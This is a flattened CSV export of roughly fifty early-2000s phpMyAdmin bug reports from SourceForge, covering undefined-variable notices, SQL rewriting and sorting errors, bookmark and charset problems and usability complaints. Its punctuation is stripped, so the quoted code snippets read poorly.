When editing multiple rows after submitting edit form) I get tons of notices Notice Undefined variable fields null in mnt data www pma tbl replace.php on line 93 Notice Undefined variable fields upload id in mnt data www pma tbl replace fields.php on line 31 Notice Undefined variable fields uploadlocal id in mnt data www pma tbl replace fields.php on line 32 Notice Undefined variable field b80bb7740288fda1f201890375a60c8f in mnt data www pma tbl replace fields.php on line 122 Notice Undefined variable fields upload parent id in mnt data www pma tbl replace fields.php on line 31 Notice Undefined variable fields uploadlocal parent id in mnt data www pma tbl replace fields.php on line 32 Notice Undefined variable fields null in mnt data www pma tbl replace.php on line 93 Notice Undefined variable fields upload id in mnt data www pma tbl replace fields.php on line 31 Notice Undefined variable fields uploadlocal id in mnt data www pma tbl replace fields.php on line 32 Notice Undefined variable field b80bb7740288fda1f201890375a60c8f in mnt data www pma tbl replace fields.php on line 122 Notice Undefined variable fields upload parent id in mnt data www pma tbl replace fields.php on line 31 Notice Undefined variable fields uploadlocal parent id in mnt data www pma tbl replace fields.php on line 32 Original URL https sourceforge.net p phpmyadmin bugs 1089 https sourceforge.net p phpmyadmin bugs 1089 Original author nijel Found in version Latest Git","bug"
"24444","7459","Undefined variables in tbl replace fields.php.
I got a whole slew of undefined variable warnings on submission when doing a multi row edit.
Here are the specific warnings not repeated ) Notice Undefined variable fields upload amp;lt;fieldname amp;gt; in var www phpMyAdmin 2.5.5 rc1 tbl replace fields.php on line 31 Notice Undefined variable fields uploadlocal amp;lt;fieldname amp;gt; in var www phpMyAdmin 2.5.5 rc1 tbl replace fields.php on line 32 Notice Undefined variable field b80bb7740288fda1f201890375a60c8f in var www phpMyAdmin 2.5.5 rc1 tbl replace fields.php on line 122 The amp;lt;fieldname amp;gt; is an edit I made.
I think that s what is, since each field got it s own.
I have no clue about the last one.
Sorry, no time for a fix today ) Michael Original URL https sourceforge.net p phpmyadmin bugs 1090 https sourceforge.net p phpmyadmin bugs 1090 Original author redbeardc Found in version 2.5.5 rc1","bug"
"24444","7460","Drop database undefined index.
From Alexander Turek When deleting a database by using the amp;quot;drop amp;quot; link, I get these php errors followed by the usual amp;quot;headers already sent amp;quot; warnings Notice Undefined index db in [...] sql.php on line 348 Notice Undefined index db in [...] sql.php on line 349 Original URL https sourceforge.net p phpmyadmin bugs 1091 https sourceforge.net p phpmyadmin bugs 1091 Original author lem9 Found in version 2.5.5 rc1","bug"
"24444","7461","Undefined offset with SHOW queries.
From Alexander Turek Typing amp;quot;SHOW DATABASES; amp;quot; into the SQL query box results in the following php error Notice Undefined offset 1 in G varwwwhtmlphpMyAdminlibrariesdisplay tbl.lib.php on line 96 Original URL https sourceforge.net p phpmyadmin bugs 1092 https sourceforge.net p phpmyadmin bugs 1092 Original author lem9 Found in version 2.5.5","bug"
"24444","7462","Query box initial contents.
From Alexander Turek By default, the SQL query box for the database view contains a single whitespace.
imho the box should be completely empty by default.
Original URL https sourceforge.net p phpmyadmin bugs 1093 https sourceforge.net p phpmyadmin bugs 1093 Original author lem9 Found in version 2.5.5 rc1","bug"
"24444","7463","Parsing of amp;quot;DEFAULT CHARACTER SET amp;quot;.
From Alexander Turek affects MySQL amp;gt;= 4.1.1) The queries CREATE DATABASE `foo` DEFAULT CHARACTER SET latin1; ALTER DATABASE `foo` DEFAULT CHARACTER SET latin1; are not pretty printed correctly amp;quot;DEFAULT amp;quot; should be parsed as a reserved word here.
Original URL https sourceforge.net p phpmyadmin bugs 1094 https sourceforge.net p phpmyadmin bugs 1094 Original author lem9 Found in version 2.5.5 rc1","bug"
"24444","7464","phpmyadmin.net downloads broken.
The download links on www.phpmyadmin.net for, for example, 2.5.5 rc1, do not work.
They display a SourceForge error message that the file could not be read, or some such.
Going through the incomprehensible) SourceForge web site to the downloads section works though.
Is submitting a bug report here the preferred way to report problems with www.phpmyadmin.net?
If so, perhaps a Category should be added for this purpose.
If this is not the preferred way, then indication of how to correctly report problems with the web site should be placed somewhere on the web site.
webmaster at phpmyadmin dot net, for example, illogically, does not go anywhere.)
Original URL https sourceforge.net p phpmyadmin bugs 1095 https sourceforge.net p phpmyadmin bugs 1095 Original author ryandesign","bug"
"24444","7465","path problems and header problems.
basically what i did was enabled save directory as tmp the first time then realized that was wrong and the export function for saving locally to the server is actually a filename not a directory which should be fixed to let us pick a filename and directory in the interface would be nice.
So i changed it to tmp export.zip since i choose zip all the time for exporting.
I hit save, it works but i get all this....
Warning Compilation failed missing terminating ] for character class at offset 4 in website blah.com php export.php on line 251 Warning Cannot modify header information headers already sent by output started at website blah.com php export.php 251) in web site blah.com php libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at website blah.com php export.php 251) in web site blah.com php libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at website blah.com php export.php 251) in web site blah.com php libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at website blah.com php export.php 251) in web site blah.com php libraries header http.inc.php on line 17 Warning Cannot modify header information headers already sent by output started at website blah.com php export.php 251) in web site blah.com php libraries header http.inc.php on line 20 Database maillist2 Table mortgage balance running on staminus GI Dump has been saved to file tmp export.zip .
Anyways if you can look over this that would be great...
I chose export on a table...cvs export for excel and clicked the include field headers box, clicked the zipped box, and the go button about it.
Original URL https sourceforge.net p phpmyadmin bugs 1096 https sourceforge.net p phpmyadmin bugs 1096 Original author anonymous","bug"
"24444","7466","Bookmarks with amp;quot; amp;quot; character.
If I try to bookmark this query SELECT SUM packets sent ) SUM packets received ) FROM `data` WHERE 1 What actually gets bookmarked is this SELECT SUM packets sent ) SUM packets received ) FROM `data` WHERE 1 And that ain t valid SQL.
Original URL https sourceforge.net p phpmyadmin bugs 1097 https sourceforge.net p phpmyadmin bugs 1097 Original author ryandesign Found in version 2.5.5 rc1","bug"
"24444","7467","TEXT fields displayed wrong with recoding enabled.
mysql wrappers.lib.php 61 change if meta amp;gt;blob || stristr meta amp;gt;type, BINARY )) \{ to if meta amp;gt;blob || stristr meta amp;gt;type, BINARY )) \{ seems help because meta amp;gt;blob for TEXT is true i don t know why) Original URL https sourceforge.net p phpmyadmin bugs 1098 https sourceforge.net p phpmyadmin bugs 1098 Original author xuefer Found in version Latest Git","bug"
"24444","7468","Can t insert NULL values into BLOB fields.
Hi, Using phpMyAdmin I am not able to insert amp;quot;NULL amp;quot; values into blob fields.
Even if blob field can be null and I can insert NULL values using SQL queries \{ Example amp;quot;INSERT INTO blobtest id, blobfield ) VALUES 1, NULL ) amp;quot; \} Is it possible to add amp;quot;Null amp;quot; checkbox next to blob fields so that it would be possible to assign null values also for blob fields in amp;quot;insert amp;quot; or amp;quot;edit amp;quot; views.
I mean the functionality that is already available for all other field types.
Teemu Original URL https sourceforge.net p phpmyadmin bugs 1099 https sourceforge.net p phpmyadmin bugs 1099 Original author kuulasma Found in version Latest Git","bug"
"24444","7469","Relation view kill references to another db.
i create REFERENCES between two tables in two different databases INNODB) db1.table1 CURRENCY ID PK db2.table1 CURRENCY ID FK RATE ID FK Enter Relation View in db2.table1 CURRENCY ID reference is empty!
), edit RATE ID reference and press Go button, reference CURRENCY ID is deleted!
Original URL https sourceforge.net p phpmyadmin bugs 1100 https sourceforge.net p phpmyadmin bugs 1100 Original author aig","bug"
"24444","7470","error thrown after valid sql statement.
my email dusoft staznostiNOSPAM.sk RVJST1I6IEMxIEMyIExFTjogMTkgMjAgMzE5ClNUUjoguwoK Q1ZTOiAkSWQ6IHNxbHBhcnNlci5s aWIucGhwLHYgMS44MSAyMDAzLzA3LzA4IDE1OjM0OjExIG xlbTkgRXhwICQKTXlTUUw6IDQuMC4x Ni1zdGFuZGFyZApVU1IgT1MsIEFHRU5ULCBWRVI6IFdpbiBJ RSA2LjAKUE1BOiAyLjUuMi1wbDEK UEhQIFZFUixPUzogNC4zLjBSQzIgTGludXgKTEFORzogc2sta XNvLTg4NTktMgpTUUw6IFNRTCBk b3RheiA6IFtVcHJhdmm7XSBbVnlzdmV0bGm7IFNRTF0gW1Z 5dHZvcmm7IFBIUCBr82RdClNFTEVD VCBTVU0oIGJwbmV3Y2hhcmdlICkgLCBTVU0oIGJwbmV3Y2 hhcmdlICkgLSBTVU0oIHBheW1lbnQg KSAtIFNVTSggdm91Y2hlciApIEFTIGFtb3VudGR1ZQpGUk9N IGJpbGxoaXN0b3J5LCBiaWxsYmF0 Y2gKV0hFUkUgYmlsbGJhdGNoLmJpbGxmcm9tICZndDs9ICc xMDAwMDAwMDAwMDAnIEFORCBiaWxs YmF0Y2guYmlsbHRvICZsdDs9ICcxMDcyODMyNDAwJwpHUk 9VUCBCWSBiaWxsaGlzdG9yeS5iaWxs YmF0Y2hJRCA9IGJpbGxiYXRjaC5JRCBMSU1JVCAwICwgMzA = ERROR C1 C2 LEN 19 20 319 STR amp;amp; 357; CVS Id sqlparser.lib.php,v 1.81 2003 07 08 15 34 11 lem9 Exp MySQL 4.0.16 standard USR OS, AGENT, VER Win IE 6.0 PMA 2.5.2 pl1 PHP VER,OS 4.3.0RC2 Linux LANG sk iso 8859 2 SQL SQL dotaz [Upravi amp;amp; 357;] [Vysvetli amp;amp; 357; SQL] [Vytvori amp;amp; 357; PHP kxc3xb3d] SELECT SUM bpnewcharge ) , SUM bpnewcharge ) SUM payment ) SUM voucher ) AS amountdue FROM billhistory, billbatch WHERE billbatch.billfrom amp;gt;= 100000000000 AND billbatch.billto amp;lt;= 1072832400 GROUP BY billhistory.billbatchID = billbatch.ID LIMIT 0 , 30 Original URL https sourceforge.net p phpmyadmin bugs 1101 https sourceforge.net p phpmyadmin bugs 1101 Original author anonymous Found in version 2.5.2 pl1","bug"
"24444","7471","Scripts assume document.all is ok. document.all is a non standard IE only feature in Javascript and should not be relied upon.
The printPage function, reproduced below, does not work in Mozilla Firebird 0.7 or any other Mozilla based browser.
A simple fix is to test for document.all) before executing the offending first line of the subroutine.
function printPage ) \{ document.all.print.style.visibility = hidden ; Do print the page if typeof window.print) != undefined ) \{ window.print ); \} document.all.print.style.visibility = ; \} Original URL https sourceforge.net p phpmyadmin bugs 1102 https sourceforge.net p phpmyadmin bugs 1102 Original author saphena Found in version 2.5.5 rc1","bug"
"24444","7472","Operate on temporary tables.
This does not work as it should create temporary table t1 select from t2; select from t1; Original URL https sourceforge.net p phpmyadmin bugs 1103 https sourceforge.net p phpmyadmin bugs 1103 Original author lem9 Found in version Latest Git","bug"
"24444","7473","dropdowns in search mode not available.
I ve defined relationships between tables.
Now I am missing the dropdowns showing the possibilities to select in the search mode.
This worked in 2.5.4.
Original URL https sourceforge.net p phpmyadmin bugs 1104 https sourceforge.net p phpmyadmin bugs 1104 Original author anonymous Found in version 2.5.5","bug"
"24444","7474","Debug code in db details structure.php.
When viewing the structure of a database that contains a table of type MRG MyISAM in phpMyAdmin 2.5.5, a dump of sts data is displayed on top of the page.
This is caused by the print r ) command in line 360 of db details structure.php.
Original URL https sourceforge.net p phpmyadmin bugs 1105 https sourceforge.net p phpmyadmin bugs 1105 Original author mfichtner Found in version 2.5.5","bug"
"24444","7475","Ignore number of records in MRG MyISAM tables.
If a database contains tables of type MRG MyISAM, the number of records in the merged table is added to the number of records in real tables when db details structure.php calculates the total number of records in that database.
IMO this is not correct MRG MyISAM tables don t have any records of their own they re just a merged view of other tables within the same database.
So, when calculating the total number of records within a database, tables of type MRG MyISAM should be ignored.
Original URL https sourceforge.net p phpmyadmin bugs 1106 https sourceforge.net p phpmyadmin bugs 1106 Original author mfichtner","bug"
"24444","7476","Unable to browse thread table in vBulletin.
Whenever I click on the thread table from vBulletin databases the left hand frame goes crazy and tries to do what looks like a META refresh as soon as it s loaded before Internet Explorer just gives up.
Original URL https sourceforge.net p phpmyadmin bugs 1107 https sourceforge.net p phpmyadmin bugs 1107 Original author anonymous","bug"
"24444","7477","Use of [VARIABLE] .
Not sure if this is the right place to put this, but when using [VARIABLE] under 2.5.3 rc3, the left section of the data replacing [VARIABLE] has an added space.
I have a query like so SELECT MAX downloads ) MIN downloads ) ) TO DAYS MAX datestamp ) ) TO DAYS MIN datestamp ) ) ) FROM tblName WHERE app = df AND username = [VARIABLE] When I type in a username say Bob ), it replaces [VARIABLE] with Bob note the leading space).
Thanks again for such a great tool!
Original URL https sourceforge.net p phpmyadmin bugs 1108 https sourceforge.net p phpmyadmin bugs 1108 Original author anonymous Found in version 2.5.3 rc3","bug"
"24444","7478","Unable to add databases with MySQL 4.1.1.
I m not sure if this is a bug somewhere or what.
I just did an upgrade to MySQL 4.1.1.
After running mysql fix privilege tables I did have to replace any recently added passwords the new longer hashes) and that might have something to do with it.
Anyway, on to the problem.
I lost the ability to add databases within phpMyAdmin after the upgrade.
I did a little checking and in main.php right after it sets is superuser in the if dbh) block the result rs usr is empty.
When I manually run the identical, either within the mysql commandline tool or within phpMyAdmin I get a valid result, with Y s for all the requested privileges.
This doesn t make sense to me.
I made sure it wasn t 2.5.5 pl1 by testing on another server running MySQL 4.1.0.
I have recompiled PHP with the new MySQL development files.
Everything else seems to work fine.
Original URL https sourceforge.net p phpmyadmin bugs 1109 https sourceforge.net p phpmyadmin bugs 1109 Original author redbeardc Found in version 2.5.5 pl1","bug"
"24444","7479","Undefined function mysql get client info ).
I run the index.php, and it shows the error Fatal error Call to undefined function mysql get client info ) in usr local phpMyAdmin libraries defines.lib.php on line 47 I am using phpMyAdmin2.5.5 pl1, PHP4.2.2, MySQL4.0.17, Apache2.0.40.
And I checked that this function should be supported for my PHP.
Why I cannot access?
Original URL https sourceforge.net p phpmyadmin bugs 1110 https sourceforge.net p phpmyadmin bugs 1110 Original author detomaso Found in version 2.5.5 pl1","bug"
"24444","7480","SQL CALC FOUND ROWS.
When executing a query from the SQL tab with SQL CALC FOUND ROWS followed by a line break, then an unescaped table name causes a problem.
phpMyAdmin will lose all of the whitespace between SQL CALC FOUND ROWS and the table name, merging the two together.
So, SELECT SQL CALC FOUND ROWS test.id FROM test becomes SELECT SQL CALC FOUND ROWStest.id FROM test I know it doesn t make sense to enter the SQL CALC FOUND ROWS in phpMyAdmin, but it gets in there when copying queries from code to test them.
Original URL https sourceforge.net p phpmyadmin bugs 1111 https sourceforge.net p phpmyadmin bugs 1111 Original author anonymous","bug"
"24444","7481","Parse error after viewing table.
In libraries display tbl.lib.php on line 875 I got a parse error.
This was caused by a missing , instead of that there was an h on that line.
Original URL https sourceforge.net p phpmyadmin bugs 1112 https sourceforge.net p phpmyadmin bugs 1112 Original author anonymous","bug"
"24444","7482","2.5.1) DROP TABLE result has focus on the db.
Hi, yesterday I spent my whole day recovering my 22.5mln record company database because I didn t read the Are you sure you want to drop...?
javascript message, so yes, it was in fact my fault.
But I d like to submit a report on a useability issue that I think can be resolved.
1\.
I clicked DROP on the right frame topmenu to drop a table 2\.
On the next page I got a MySQL error about dropping the table Error on delete of .\databasename\tablename.MYI Errcode 13) ), which I thought was something temporary 3\.
because I thought it was a temporary error, I tried dropping the same table again by clicking DROP again.
Because I was convinced that it was the same DROP link I was clicking, I didn t read the warning message yes I know, that is a stupid thing to do) 4\.
I was totally flabbergasted when I saw the message You have succesfully dropped database databasename 5\.
I panicked Wouldn t it be better if phpMyAdmin would still focus on the table when an error occured during the drop?
Additional information phpMyAdmin version 2.5.1 PHP version 4.0.6 MySQL version 3.23.44 nt User Agent Mozilla 5.0 Windows; U; Windows NT 5.1; en US; rv 1.4) Gecko 20030624 Original URL https sourceforge.net p phpmyadmin bugs 1113 https sourceforge.net p phpmyadmin bugs 1113 Original author kajurria Found in version 2.5.1","bug"
"24444","7483","Dropping field destroys all table relations.
Dropping field destroys all relations and comments attached to a table.
The problem is in file `mult submits.inc.php` at line 237 PMA relationsCleanupTable db, table, selected[ i]); What should obviusly be PMA relationsCleanupColumn db, table, selected[ i]); That should urgently fixed, because this could cause big data loss at this moment.
Original URL https sourceforge.net p phpmyadmin bugs 1114 https sourceforge.net p phpmyadmin bugs 1114 Original author j georg Found in version Latest Git","bug"
"24444","7484","no CONSTRAINT in MySQL 3.23.58.
Hi I get the following error when viewing an InnoDB table with two foreign key contraints Notice Undefined index constraint in var www html phpmyadmin libraries relation.lib.php on line 321 Would anyone know how to fix the warning?
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 1115 https sourceforge.net p phpmyadmin bugs 1115 Original author johnfive","bug"
"24444","7485","2.5.5 pl1) [VARIABLE] does not work.
I always get an error when trying to use the variable feature in bookmarks.
Steps to re produce Open SQL tab of a database.
Enter following query there and execute it SELECT FROM `automode` WHERE 1 AND `channelID` = [VARIABLE] Store bookmark that query.
Select the bookmarked query in SQL tab and enter a variable, i.e.
1 without quotes).
Try to execute that query.
I get following error SQL query SELECT FROM `automode` WHERE 1 1 LIMIT 0 , 30 MySQL said 1064 You have an error in your SQL syntax near 1 LIMIT 0, 30 at line 3 I had the same problem with phpMyAdmin 2.5.1, too.
I use Windows XP Home Edition, Apache 1.3.24 Win32) PHP 4.2.0 and MySQL 3.23.49 nt.
Original URL https sourceforge.net p phpmyadmin bugs 1116 https sourceforge.net p phpmyadmin bugs 1116 Original author ci dev Found in version 2.5.5 pl1","bug"
"24444","7486","2.5.5 pl1) MySQL 3) cannot sort results with GROUP BY.
This worked with 2.5.1, but now, it doesn t work anymore Sorting the results if there is a GROUP BY present in the query.
But this only affects a SELECT , not a SELECT lt;field s) gt; , that is SELECT FROM `table` GROUP BY `field1` doesn t let me sort the result set, but with SELECT `field1`, `field2` FROM `table` GROUP BY `field1` , it works perfectly.
Original URL https sourceforge.net p phpmyadmin bugs 1117 https sourceforge.net p phpmyadmin bugs 1117 Original author ci dev Found in version 2.5.5 pl1","bug"
"24444","7487","display last query wrongly.
How to reproduce create a table with any fields insert one or more rows browse that table select all rows with selected remove click yes to remove them Now, you see what I mean.
I ll attach a screenshot to make clear what I mean.
Original URL https sourceforge.net p phpmyadmin bugs 1118 https sourceforge.net p phpmyadmin bugs 1118 Original author ci dev Found in version 2.5.5 pl1","bug"
"24444","7488","Execute stored bookmark doesn t work.
In pma bookmark table stored bookmarks don t work with the provided Execute bookmarked query link.
I have a bookmark there, and once I click on the link Execute bookmarked query , I see the SQL tab site with the note No SQL query!
.
Original URL https sourceforge.net p phpmyadmin bugs 1119 https sourceforge.net p phpmyadmin bugs 1119 Original author ci dev Found in version 2.5.5 pl1","bug"
"24444","7489","Can t re sort non field columns.
I see the following problem in 2.5.5 pl1 I made a table called test in the test database and I gave it one integer field called id.
I inserted two rows.
Then I ran this silly query SELECT t.id, t.id t.id AS id squared FROM test t This worked fine.
But when I clicked on the id squared header to re sort the table, PMA generated an invalid SQL query SELECT t.id, t.id t.id AS id squared FROM test t ORDER BY.`id squared` ASC LIMIT 0 , 64 You see, it put a dot before id squared which does not belong there.
Original URL https sourceforge.net p phpmyadmin bugs 1120 https sourceforge.net p phpmyadmin bugs 1120 Original author ryandesign Found in version 2.5.5 pl1","bug"
"24444","7490","empty datetime is set to present when editing.
phpMyAdmin 2.5.5 pl1 MySQL 4.0.16 Max I have a table containing a datetime field, which is set to NULL by default.
When I edit a record, whose datetime field has not been set so far it is still NULL), the input field for that datetime field in the HTML form contains the present date and time by default although it should be empty).
Therefore, unmindfully saving the record without deleting the default value) sets the datetime field to the present date and time ...
Regards, trinita mail trinita.de Original URL https sourceforge.net p phpmyadmin bugs 1121 https sourceforge.net p phpmyadmin bugs 1121 Original author anonymous","bug"
"24444","7491","undefined constant dblink errors.
Numerous Notice Use of undefined constant dblink assumed dblink in export home eugenem public html phpMyAdmin libraries dbi mysql.dbi.lib.php on line 190 errors in the left frame.
Line 190 of mysql.dbi.lib.php reads if !dblink) \{ Probably should read if !
dblink) \{ Original URL https sourceforge.net p phpmyadmin bugs 1122 https sourceforge.net p phpmyadmin bugs 1122 Original author anonymous Found in version Latest Git","bug"
"24444","7492","Call to undefined function in defines.lib.php.
Hi, I just installed phpmyadmin 2.5.5 pl1 on my Fedora Core 1 server.
When going to phpmyadmin and logging in via the virtual server I setup under Apache, I get the following error Fatal error Call to undefined function mysql get client info ) in home npgx public html phpmyadmin libraries defines.lib.php on line 47 I m happy to provide more information as requested.
The following are the versions of the software I have running on FC1 rpm qa|grep mysql mysql 3.23.58 4 mysql server 3.23.58 4 php mysql 4.3.4 1.1 mod auth mysql 20030510 3 [root tiger root] rpm qa|grep perl DB perl DBD MySQL 2.9002 1 perl DBI 1.37 1 perl DBD Pg 1.22 1 Thankyou.
Michael.
Original URL https sourceforge.net p phpmyadmin bugs 1123 https sourceforge.net p phpmyadmin bugs 1123 Original author micoots Found in version 2.5.5 pl1","bug"
"24444","7493","result JS highlighting is broken.
Normally, if you browse the results of a query, there is a hover effect when you go over any record with your mouse cursor, and you can mark them, but clicking on them.
However, this is broken after doing a With selected delete .
Steps to reproduce the problem create a table insert two or more records browse table mark any number of records not all) use with selected delete accept delete with ok button Now, records highlighting won t work anymore, because lt;script src= libraries functions.js type= text javascript language= javascript gt; lt; script gt; is missing in the generated page.
Original URL https sourceforge.net p phpmyadmin bugs 1124 https sourceforge.net p phpmyadmin bugs 1124 Original author ci dev Found in version 2.5.5 pl1","bug"
"24444","7494","mysqlversion check with multiple servers.
When phpmyadmin is configured to be able to use multiple servers, some constants are checked before being defined when you have nt chosen a server yet).
an example of this in main.php if PMA MYSQL INT VERSION lt; 32332) \{ echo lt;p class= warning gt; .
sprintf strUpgrade, MySQL , 3.23.32 ) .
lt; p gt; .
\n ; \} should be something like if defined PMA MYSQL INT VERSION ) PMA MYSQL INT VERSION lt; 32332) \{ echo lt;p class= warning gt; .
sprintf strUpgrade, MySQL , 3.23.32 ) .
lt; p gt; .
\n ; \} Original URL https sourceforge.net p phpmyadmin bugs 1125 https sourceforge.net p phpmyadmin bugs 1125 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","7495","Query rewrite error on sort.
Not entirly sure of the category, please change if necessary.)
This bug is seen in 2.4.0, 2.5.4 and 2.5.5pl1, but not in 2.3.2. mysql 3.23.58 1.9 and mysql 4.0.15 First observed with phpMyAdmin 2.5.4 MySQL 4.0.15 Table Notes gedID gt; family user id int) famindi gt; F I char 1)) serial gt; note order int) note gt; text) SELECT FROM `Notes` ORDER BY `famindi` DESC, `gedID` , `serial` LIMIT 0 , 30 click sort on column gedID result Error SQL query SELECT FROM `Notes` , `gedID` , `serial` ORDER BY `gedID` ASC LIMIT 0 , 30 MySQL said 1146 Table ged.gedID doesn t exist Obviously fields on which ordering was done before are moved to the FROM part of the query.
Original URL https sourceforge.net p phpmyadmin bugs 1126 https sourceforge.net p phpmyadmin bugs 1126 Original author leonardjo","bug"
"24444","7496","utf 8 disabled on utf 8 databases.
select lang.lib.php spikes UTF 8 is there s no Recode.
However, if the database itself is in UTF 8 possible as of current MySql), then recode isn t needed to display UTF 8.
The conditional should reflect this.
Original URL https sourceforge.net p phpmyadmin bugs 1127 https sourceforge.net p phpmyadmin bugs 1127 Original author benson basis Found in version 2.5.5 pl1","bug"
"24444","7497","PMA does not add MySQL charsets to WHERE clauses.
When trying to edit record the following error occurs 1210 Wrong arguments to = This is caused by collation assigned to column ID eg.
cp1250 general ci).
The following query is executed SELECT FROM `mytable` WHERE `ID` = XXXXX And the valid one is SELECT FROM `mytable` WHERE `ID` = cp1250 XXXXX I changed line 1073 in display tbl.php phpMyAdmin 2.5.5pl1) lt; lt; lt; condition .= = \ .
PMA sqlAddslashes row [ pointer], FALSE, TRUE) .
\ AND ; gt; gt; gt; condition .= = cp1250\ .
PMA sqlAddslashes row[ pointer], FALSE, TRUE) .
\ AND ; and everything works fine for me), but of course collation refers to a column definition.
Original URL https sourceforge.net p phpmyadmin bugs 1128 https sourceforge.net p phpmyadmin bugs 1128 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","7498","Undefined variable submit mult.
Notice Undefined variable submit mult in ...\tbl row delete.php on line 25 Notice Undefined variable submit mult in ...\tbl row delete.php on line 29 patched version, see 882695) I added dumps to reproduce that behaviour.
The problem is the following If you try to edit delete a record, pma uses links, but for a large record, it uses a form and something is broken with those forms.
The only thing which looks broken to me is value= amp;quot;Delete amp;amp;quot; title= amp;amp;quot;Delete amp;amp;quot; border= amp;amp;quot;0 amp;quot; Another problem is the with selected feature Normally, it s all a big form, where the selected stuff is transmitted, but with large records, there are forms nested in forms, which might not be understood by IE, and which is forbidden by HTML specification.
Original URL https sourceforge.net p phpmyadmin bugs 1129 https sourceforge.net p phpmyadmin bugs 1129 Original author ci dev Found in version 2.5.5 pl1","bug"
"24444","7499","Delete from tabName where.. gives javascript error in list.
Executing queries like Delete from tableName where condition gives javascript error in the next listing shown.
The error is generated when the user rollovers the mouse on the rows of the list.
My email address mitulbhammar yahoo.com Original URL https sourceforge.net p phpmyadmin bugs 1130 https sourceforge.net p phpmyadmin bugs 1130 Original author anonymous","bug"
"24444","7500","Cannot Edit First Row in Table w o Primary Key.
Currently have two version 2.5.3 2.5.5 pl1 seperate directories) running agains a 3.23.58 MySQL database.
In version 2.5.5 pl1, when selecting the first row from the list of entries for editing, it displays the header informations Database db Articles Table tb CurrentArticles running on localhost, but no data rest of browser is blank).
So, to work around the issue, I sort the records differently and then I can edit a record as long as it is not the first row.
Works fine in version 2.5.3.
I tried this on my local Red Hat Linux 9.0 machine and have the problem, also occurs on a Verio supplied web site that I host Verio has Mysql version 3.23.58 running on Unix).
With 2.5.3 no problems when running against the Verio web site and their database, or local on my Linux box running a local database server.
Original URL https sourceforge.net p phpmyadmin bugs 1131 https sourceforge.net p phpmyadmin bugs 1131 Original author apetrusk Found in version 2.5.5 pl1","bug"
"24444","7501","2.5.5 pl1) Space usage per table.
When looking at the details of the table, the space used on the disk is shown.
In the listview of the tables per database this is done correct 1,1 Gb) but in the details view there s KB which must be MB, or MB which must be GB my data Space usage Type Usage Data 468,475 KB Index 708,574 KB Total 1,149 MB ) Also found in previous versions of phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin bugs 1132 https sourceforge.net p phpmyadmin bugs 1132 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","7502","PMA chokes on undef.
functions if query fails.
error I get Server .
.
.
Fatal error Call to undefined function pma sqp iserror ) in html phpMyAdmin libraries commo n.lib.php on line 488 I am trying to install phpMyAdmin 2.5.6 rc1 on an Interland BlueHalo b200 Plan Linux.
I can t seem to get phpMyAdmin to work.
The only changes I made in configuration in config.inc.php cfg[ PmaAbsoluteUri ] = cfg[ Servers ][ i][ host ] = cfg[ Servers ][ i][ controluser ] = cfg[ Servers ][ i][ controlpass ] = Any help would be greatly appreciated Thanks in advance Popoco Original URL https sourceforge.net p phpmyadmin bugs 1133 https sourceforge.net p phpmyadmin bugs 1133 Original author popoco Found in version 2.5.6 rc1","bug"
"24444","7503","undef var prev upper in sqlparser.lib.php.
Only in 2.5.6 rc1 ok in 2.5.5 pl1) database mysql table any tab operations Undefined variable prev upper in ...\libraries\sqlparser.lib.php on line 628 This happens only in db mysql .
mysql 4.0.17 max nt apache 2.0.47 php 4.3.1 pMA 2.5.6 rc1 Peter Original URL https sourceforge.net p phpmyadmin bugs 1134 https sourceforge.net p phpmyadmin bugs 1134 Original author mandabaer","bug"
"24444","7504","Able to create a db with only db specific priviliges.
I created a db specific user in mysql with all priviliges to one database only and no global priviliges and I m able to create a new database with this account.
With the same account I m not able to do this by MySQL shell commandline.
If you want to see what is happening, I can provide you with a login to my playing site.
Original URL https sourceforge.net p phpmyadmin bugs 1135 https sourceforge.net p phpmyadmin bugs 1135 Original author nielsvdc Found in version 2.5.5 pl1","bug"
"24444","7505","add root PW.
After I added a Password for my mySQL root ID, phpmyadmin 2.5.6 rc1 did not work anymore.
After I put the new PW into the config file, phpmyadmin was running well.
Why did phpmyadmin not add the PW by itself?
Original URL https sourceforge.net p phpmyadmin bugs 1136 https sourceforge.net p phpmyadmin bugs 1136 Original author hgalt Found in version 2.5.5 pl1","bug"
"24444","7506","safe show databases feature..
I just installed 2.5.5 pl1 from 2.5.2.
It appears that the safe database list feature which does not raise a permission denied on the SHOW DATABASES error.
I can t seem to re enable this feature, nor is it documented anywhere that it has been removed.
Original URL https sourceforge.net p phpmyadmin bugs 1137 https sourceforge.net p phpmyadmin bugs 1137 Original author phyre2k","bug"
"24444","7507","changing of datas.
my english is too bad, so in german.
Wenn ich in die xc3x9cbersicht Anzeigen fxc3xbcr eine Tabelle gehe, und dann gleich den ersten Datensatz xc3xa4ndern will.
Dann bekomme ich kein Menxc3xbc zum xc3xa4ndern.
Allerdings nur, wenn die Tabelle kein Primary Key hat.
Hat sie einen, dann kann ich auch gleich den ersten xc3xa4ndern.
Aber wenn ich die Datensxc3xa4tze sortieren lasse, dann kann ich wieder den ersten in einer Tabelle ohne Primary Key xc3xa4ndern.
Original URL https sourceforge.net p phpmyadmin bugs 1138 https sourceforge.net p phpmyadmin bugs 1138 Original author anonymous Found in version 2.5.6 rc1","bug"
"24444","7508","change password does not like } in password mysql user.
if you change some users password to, say, ]rZgUn\}09 kq mysql never seems to get the right password, which seems related to the \} in the password.
this is pma 2.5.5 p1 with MySQL 3.23.56.
Original URL https sourceforge.net p phpmyadmin bugs 1139 https sourceforge.net p phpmyadmin bugs 1139 Original author anonymous Found in version 2.5.5 pl1","bug"
"24444","7509","Relation view doesn t produce any pages.
I try to make a relation view of my tables.
I v filled relation , table coords and pdf pages variables... Also editted the relations for the tables.
However, when i want to produce the pages I get the following error Fatal error No parent class available in this context in home www phpMyAdmin pdf schema.php on line 128 I m flabbergasted..... Also tried 2.5.5pl1.
After tweak a file in libraries something with absent get mysql client info ) ) I get the same different line) error....
Original URL https sourceforge.net p phpmyadmin bugs 1140 https sourceforge.net p phpmyadmin bugs 1140 Original author anonymous Found in version 2.4.0","bug"
"24444","7510","2.5.6 rc2) editing text fields results in blank page.
Hello This applies to both versions, 2.5.6 rc1 and 2.5.6 rc2 of PMA.
